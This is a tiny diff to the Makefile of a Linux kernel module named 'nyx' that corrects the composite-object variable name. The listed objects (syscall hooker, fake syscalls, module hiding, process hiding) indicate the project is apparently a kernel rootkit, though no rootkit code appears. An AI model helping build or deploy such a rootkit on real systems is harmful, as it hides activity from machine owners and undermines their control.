--- a/nyx/Makefile
+++ b/nyx/Makefile
@@ -1,5 +1,5 @@
 obj-m := nyx.o
-umbra-y := main.o hooker.o fake_syscalls.o module_hiding.o process_hiding.o
+nyx-y := main.o hooker.o fake_syscalls.o module_hiding.o process_hiding.o
 
 ccflags-y += -g -DDEBUG
 
